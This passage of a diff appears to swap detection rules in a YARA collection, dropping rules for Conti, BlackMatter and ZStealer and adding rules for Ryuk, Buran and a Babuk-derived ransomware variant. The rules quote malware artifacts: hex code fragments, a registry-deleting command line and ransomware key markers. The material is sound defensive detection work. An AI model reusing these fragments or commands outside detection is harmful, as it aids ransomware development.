+		$r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide
+		$ref1 = "lsaas.exe" fullword wide
+		$ref2 = "Ncsrss.exe" fullword wide
+		$ref3 = "$WGetCurrentProcess" fullword ascii
+		$ref4 = "lan.exe" fullword wide
+		$ref5 = "explorer.exe" fullword wide
+		$ref6 = "Ws2_32.dll" fullword ascii
+		$p1 = "\\users\\Public\\sys" fullword wide
+		$p2 = "\\Documents and Settings\\Default User\\sys" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $c* ) and 1 of ( $r* ) and 4 of ( $ref* ) and 1 of ( $p* )
 }
-rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE
+rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE
 {
 	meta:
-		description = "Detect unpacked Conti ransomware (May 2021)"
+		description = "Detect RYUK ransomware (Sept_2020_V1 + V2)"
 		author = "Arkbird_SOLG"
-		id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e"
-		date = "2021-05-20"
-		modified = "2021-05-21"
+		id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6"
+		date = "2020-10-25"
+		modified = "2020-10-28"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41"
+		logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		hash1 = "Redacted"
-		hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266"
-		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
-		hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2"
+		hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe"
+		hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8"
+		hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
+		hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
+		hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
+		hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204"
 
 	strings:
-		$seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 }
-		$seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b }
-		$seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff }
-		$seq4 = { 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e }
-		$seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b }
-		$seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c }
+		$s1 = "Type Descriptor'" fullword ascii
+		$s2 = "Class Hierarchy Descriptor'" fullword ascii
+		$s3 = "GET:PV" fullword ascii
+		$s4 = "Base Class Descriptor at (" fullword ascii
+		$s5 = "Complete Object Locator'" fullword ascii
+		$s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii
+		$s7 = "FrystFsgcteIaui" fullword ascii
+		$s8 = "delete[]" fullword ascii
+		$s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii
+		$s10 = "FrystGfuvrozHctj" fullword ascii
+		$s11 = "FrystUfngasfCqovf{v" fullword ascii
+		$op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 }
+		$op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 5 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 6 of ( $s* ) and 1 of ( $op* )
 }
-rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect BlackMatter ransomware"
+		description = "Detect Buran ransomware"
 		author = "Arkbird_SOLG"
-		id = "eb308cde-af92-5b34-b256-88009f90810f"
-		date = "2021-08-02"
-		modified = "2021-08-02"
-		reference = "https://twitter.com/abuse_ch/status/1421834305416933376"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23"
+		id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c"
+		date = "2020-11-05"
+		modified = "2020-11-06"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75"
-		score = 50
-		quality = 71
+		logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6"
-		hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984"
-		level = "Experimental"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af"
+		hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb"
+		hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6"
+		hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5"
+		hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb"
+		hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8"
 
 	strings:
-		$s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 }
-		$s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 }
-		$s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 }
-		$s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa }
-		$s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 }
-		$s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d }
-		$s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc }
+		$s1 = "!!! LOCALPUBKEY !!!" fullword ascii
+		$s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii
+		$s3 = "!!! D !!!" fullword ascii
+		$s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 }
+		$s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii
+		$s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect ZStealer stealer used by Void Balaur group"
+		description = "Detect Piton variant (rebuild from the Babuk leaks)"
 		author = "Arkbird_SOLG"
-		id = "0282884b-569a-5e46-a6ad-d2776ff71ddb"
-		date = "2021-11-11"
-		modified = "2021-11-12"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19"
+		id = "433d0692-553b-5efe-84e4-134e99342fe5"
+		date = "2021-11-03"
+		modified = "2021-11-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3"
+		logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052"
-		hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f"
+		hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac"
+		hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9"
+		hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1"
 		tlp = "white"
-		adversary = "Void Balaur"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 }
-		$s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff }
-		$s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 }
-		$s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 }
-		$s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 }
